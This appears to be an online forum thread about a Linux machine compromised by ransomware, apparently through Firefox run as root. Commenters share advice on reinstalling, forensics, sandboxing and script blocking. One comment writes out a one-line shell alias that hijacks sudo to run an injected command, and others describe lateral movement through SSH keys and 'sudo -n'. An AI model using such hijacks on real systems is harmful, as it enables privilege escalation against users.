It doesn't seem to have been mentioned on the forums, which is alarming, but the correct response to finding out your machine has been owned is to shut it the fuck down. Right away. Then boot up a rescue CD, which will have a known working system (read: not compromised), from which you can do some forensic work to find out how you were owned and what data is recoverable.
Take the data you can recover offline and then reinstall from scratch. Don't try to fix it, just recover what you can and throw the rest away.
> from which you can do some forensic work to find out how you were owned
It's worth noting that if you are really serious about doing forensics and investigating the attack, then shutting down can be pretty destructive.
> what data is recoverable.
Another point I'd make is that try to recover as little as possible from the infected system and prefer using clean backups instead.
I agree on the overall sentiment though, attempting to recover a infected system is unnecessarily risky. Nuke it from the orbit, it is the only way to be sure.
I may be wrong, but these days doesn't malware have a loader (which has a hook in the boot cycle at some point) and a payload (which usually poses as an innocent file tucked away on your system somewhere). Even if you wholesale recover your data and include the payload, there is no loader hooked into your newly-installed system, rendering the payload a digital bullet without a corresponding gun. As far as I'm aware, infecting your MP3s or JPEGs was more something ye olde worms did, no?
Trying to make distinctions like this gets you back to "figuring out how you were owned", i.e. determining the transmission vectors and threats.
The reality is that decoders for complex file formats often have buffer overrun and code execution flaws. If such mechanisms were used in the original attack or if the malware has worm-like abilities to extend the attack from your compromised machine, then wouldn't it me likely that more such corrupted data is also being staged to your machine?
Also, a very real risk would be the huge number of little scripts and configuration files which offer embedded scripting syntaxes. A naive victim might think they can install a new OS and just "recover their custom configuration files", but they are really recovering the attacker's configuration which can include the actual malware activation or other fail-safe reinfection mechanisms.
> In the first demo, I just select the PDF document with one click. This is enough to exploit the vulnerability, because the PDF document is implicitly read to gather extra information.
> In the second demo, I change the view to Thumbnails view. In a thumbnail view, the first page of a PDF document is rendered to be displayed in a thumbnail. Rendering the first page implies reading the PDF document, and hence triggering the vulnerability.
> In the third demo, I use my special PDF document with the malformed stream object in the metadata. When I hover with the mouse cursor over the document (I don’t click), a tooltip will appear with the file properties and metadata. But with my specially crafted PDF document, the vulnerability is triggered because the metadata is read to display the tooltip…
And if you are paranoid, don't wait for proper shutdown, but pull the power plug. Don't bother with the network plug, pull the power plug right away. Some powners don't like interrupts and have a nice easter egg in the shutdown or network down procedure, e.g. erasing stuff you might not have backupped (which, I am sure, you have, right?).
> It doesn't seem to have been mentioned on the forums, which is alarming
Really?
>> Best thing to do when dealing with this kind of stuff is disconnect the network, cold reboot off a livecd and and go from there.
>> That means that they got root.
You can't clean that up, its a reinstall. [...]
If you want to do forensics, make a disc image of the install and work on that. You need the filesystem free space too, as that's where the interesting stuff will be.
Even better - make sure that everything is under version control or backed up so that in such a situation you can just reinstall from scratch without introducing the possibility of "recovering" infected files.
Why does it matter if Firefox ran as root or not? I agree it's terrible practice in principle. But most people will run Firefox as their ordinary user, which normally has full access to the files in their home directory.
If someone gets arbitrary code execution under your user, they can erase/encrypt your files. Who cares if the OS files are safe. All the data you really care about will be gone.
agree. ordinary user is absolutely sufficient.
I'll now present a sophisticated privilege escalation method that most of us won't notice (me included, sarcasm off):
alias sudo='/usr/bin/sudo echo something evil && /usr/bin/sudo'
I don't think it matters that he used his root account.
As an attacker, I test for sudo -n. If it succeeds, I have root. In most cases I do not need it however. SSH key trusts, SSH multiplexing and bad posix permissions are more than enough to get me anywhere and grab anything.
If they have access to your .bashrc they can also alter your PATH and create a script named sudo somewhere they have write access to that carries the malicious payload. So you're not gaining much by adding the quotes.
There may be things an exploit can do as root that wouldn't work under your user to break out of the adobe flash "sandbox". But yeah, the real recommendation is to get rid of flash and kill it with fire. The security of free software isn't fullproof but good riddance from the web to that particular closed source blob.
The whole point of security and good practices is to make harder for those arbitrary codes to be executed (or for whatever other flaws to be exploited, until they're fixed). Running a browser as root is not good practice. Doesn't mean that something bad will happen, but it's more or less line laying the cheese on the ground and expecting mice not to go after it. Even if you have none around, you just shouldn't risk it. At all. Unless you know exactly what you're doing.
This is why I wish people took mandatory access control more seriously. But to make it really pervasive and useful you need something like what Android has, where the file format mandates MAC profiles for the app. Even Red Hat cannot maintain SELinux profiles for every package in every repo, and even then third parties would complain about having to write the profiles just for RHEL / Fedora packages.
It is something the entire ecosystem would have to, at once, agree to make happen, and then standardize mandated MAC profiles in every package format. So basically never.
The title seems fine to me. I knew Linux ransomware was a theoretical possibility, but I didn't know it was out there in the world. Or, as they say, "in the wild".
stand up an old version of wordpress with poor admin/admin credentials on an external box, and wait a couple hours. You'll find all sorts of malware on a linux box. ransomware included. Pretty common, though it seems most people who compromise linux machines use them to launch further attacks, not ransomware.
The ransomware linux variants I see all do about the same thing: wipe various /var/log/* logfiles, they encrypt all your mysql dbs, your homedir files, and your webserver docroot.
I'm not sure I agree with your anlaysis. True the user ran Firefox as root (which is terrible practice), but also had the same problems on a different system that never ran firefox:
> Interesting to note that another system, also a sister, seems to have caught the same, and I can't recall ever having run anything but VirtualBox VMs on that one, it's turned off right now until I figure out a recovery plan, so at least 2 systems to recover, and have one clean one to do so from.
That said, it could easily be explained if SSH private keys weren't encrypted (passphrase protected) and allowed an easy hop from infected to sister. And if somebody is running Firefox as root, it doesn't seem too extreme to assume they might have unencrypted private keys...
So it may just be from running Firefox as root, but it's still possible it could be from other things.
> TL;DR: The user ran firefox as root and the attack happened through adobe-flash. Hardly a sophisticated attack.
That has been speculated but far from proven. On the last page they are still talking about the point of entry and how they are in no way convinced it was FF/Flash.
People claim to run noscript but every page calls js from 10 different domains. How on earth do you navigate what to let through and what to block? And at some point, to me, it’s just too many mouse clicks!
You learn with the time and also sometimes when its not so obvious, what to activate and what not, I just close the tab and don't bother with the content.
It can be tedious; but so can waiting for somebody's poorly written javascript to lag your browser.
I started blocking all JS by default for security, but I've actually found it to be a much better user experience as well. You deal with the annoyance of having to whitelist domains, and sure a lot of SPAs don't work at all until you enable JS for the client-side rendering, but many, many websites work far better because all the content I care about is server-side rendered and JS is used to load ads that disrupt the experience (this is especially true on mobile. For that I highly recommend the Brave browser). You'd be surprised how much better it can make parts of the web tho to have no JS :-)
> It really has changed the way I use the internet.
I agree so much. I cannot recommend umatrix highly enough. It has put me completely back in control of what sites can and can't do. I block everything by default except for first-party CSS and images (e.g. *.ycombinator.com when I visit news.ycombinator). It's great, and not at all as bothersome as I thought.
No more HTML5 pop-ups, deceptive ads, no more auto loading videos, no more sneaky audio, no more weird javascript that slows my browser to a crawl, no more tracking.
On my laptop, I block all images by default, while I don't on my desktop (like you, I load CSS and images there).
I find myself more and more liking to use my laptop for browsing, which makes me think I could block images by default on my desktop as well and rarely ever notice it anymore.
Running NoScript is a real eye-opener, even if you don't stick with it, because the about of bullshit that is pulled down from visiting a common website is incredible.
On my Linux desktop, I run firefox with uMatrix and if a page isn't readable without javascript then I don't bother, except a very few handful of sites that are whitelisted. If it's content that I really feel like I need to see, then I run chromium with just an ad blocker. They are each run from separate chroot instances, though with firefox container tabs that won't be as necessary anymore maybe.
On my macbook, I run Safari with no loading of JS or images at all, and firefox with uMatrix again. And again, if a page isn't readable without JS, then I don't read it, or I wait until I can use chromium on my desktop, assuming that I'm not going to allow the scripts in uMatrix, which I usually don't.
On my phone, I run Safari with JS always disabled, which is actually perhaps surprisingly fine for the vast majority of mobile websites.
And I run firefox for iOS with JS enabled if I really really need to look at something that doesn't work on non-JS Safari.
You get used to it. Most JS on the web is junk anyway. I don't have any FOMO by avoiding JS almost entirely, but maybe that's just me (and people like me)?
I run umatrix, and I block everything. Cookies, CSS, images, scripts, media, XHR, etc. Everything, except for CSS and images from the thirst-party domain (e.g. *.ycombinator.com).
Most sites actually work better with this. They're faster, there's less clutter, no ads, less risk. Some need a little convincing by unblocking some CSS or images. Umatrix makes this super easy. If a site requires javascript to run, I just skip that content. It's different for web apps like trello or github of course. Those get much more permissions.
> How on earth do you navigate what to let through and what to block?
umatrix gives a nice matrix (duh) that shows exactly what's trying to load. I dont often need to unblock things, but when I do, it's usually obvious right away. Takes maybe two clicks. Worth the effort IMHO
I use the built-in script blocking in Chrome, it's fairly quick to whitelist any scripts i actually want to run. It's by domain though, so not really perfect. I also block ad servers at the DNS level, and run an an blocker. Until recently I didn't need the blocker, but ad networks have gotten better at serving from legitimate hosts, so I can't just block them anymore.
There are lots of services I would be glad to outright pay for, or have some sort of flattr-type service attached to. I don't feel one iota guilty for blocking ads, given the risks and costs.
Its a worthy of the time endeavor, trust me. White listing very carefully over time enhances the browser experience, but you are right there are sites that go excessive on the off-domain js callS, but I choose to just get content elsewhere. Its time people were pickier about this stuff and pushed back more to the companies.
Not trying to blame the user, just trying to understand: why would someone ever run a web browser as root? A text editor to edit system files, ok, but a browser?
Seeing as the user's main problem is their home directory was encrypted, the root doesn't seem like it would make any difference...
Better would be easier ways to run browsers (and all applications) inside protected systems of some kind, so even if they are hacked they can't touch anything outside their own cache directory, and creating downloaded files.
You're describing a sandbox. You run the security-vulnerable routine inside a separate process and give this process the most minimal read/write-permissions that the routine can still work with.
Flash itself has been sandboxed inside Firefox's Plugin Container since forever and Firefox is getting a sandbox around tabs as we speak.
But you can break out of sandboxes. By either exploiting a bug in the OS that bypasses process permissions or by finding a hole in the sandbox that allows you to do things.
I imagine, for example, if you want to upload a file, then the tab-process has to talk to the less restricted main-Firefox-process, which has to then open up a file-chooser dialog and give control to the user.
But it could for example be possible to somehow malform this request to the main-Firefox-process, so that the file-chooser crashes and just hands over a random file, before the user has even seen the dialog. (Obviously, I'm not going to come up with an actual security vulnerability on the spot here.)
This kind of vulnerability can't be fixed with a sandbox. You need some way to upload files, for which you'll need filesystem access in some way and to pretty much the entire Home-directory.
Theoretically, you could require the user to copy the file into a separate "Upload"-directory and then only have read-permissions to that directory, but that's hardly user-friendly and would probably end up with some users keeping their entire Home-directory underneath that Upload-directory.
Hmm... I half expected this to be a joke and the post about how they had to compile it themselves and were trying to get the dependencies squared away.
Friends don't let friends run Flash. Does Gentoo have Firejail readily available? That would have prevented this, I'm pretty sure.
Hadn't thought of it before but it might be an idea to run my browser (Firefox, Kubuntu 17.04) under a separate user that doesn't have access to my main user files.
Might be simplest to just create a user through the DE, then "su -c" from my main user to run the browser?
I currently run my kids browsers under my user by doing "xhost +local:; su -l -c /usr/bin/firefox $USERNAME" where USERNAME is the kids login. I may have made changes to enable that, don't recall sorry.
Another option would be a sandboxing system like xdg-app. AFAIK, there's already a xdg-app release of LibreOffice, and an experimental xdg-app build of Firefox.
And, of course, there's always the paranoid option of "run the browser within a virtual machine", so an attacker would have to break the browser, then get local root within the VM, and finally find an exploit for the VM, before getting to your files.
Uploading files would become a chore, as you'd always have to copy them over from your actual Home-directory to that Firefox-user's, but yeah, it would add another thick layer that attackers would have to get through.
Mind that Firefox is also getting sandboxed tabs as we speak, so yet another layer that attackers would have to get through, which wasn't in place at the time of this attack.
There is trend of insecurity/vulnerabilities that seems to gain in speed in recent months. Not trying to sound ominous and nothing to really point finger to but it seems like a thing.
Since few months ago I do almost all browsing in carefully set w3m. No javascript at all of course and certainly no flash. I am typing this in vim which is set as default form editor in w3m for me.
Edit: if you are wondering if w3m can work well try looking at HN using w3m, its a real beauty.
That is one of the reasons I am thinking about having /home on NILFS2 ([1] a log-structured file system) in my dabbing with my own Linux distribution. When you have constant snapshots then ransomware can't do much, can it?
Depends on what permissions it has. If it runs as root, it probably could delete/mess up snapshots. If it's going to do so, especially for non-mainstream filesystems, is another question.
Only if the snapshots are read-only and/or invisible by default; some systems expose snapshots as additional directories under some mountpoint, in which case they just get encrypted as well.
Yes, I got hit by this on two separate machines in June or so, they'll break into one, steal all the SSH keys and look through your history looking for more machines to break into. It sucks ass. I suspect that my breakin was because of an outdated Wordpress installation I kept around.
This malware is super thorough and super obnoxious. Keep your machines up-to-date.
Take the data you can recover offline and then reinstall from scratch. Don't try to fix it, just recover what you can and throw the rest away.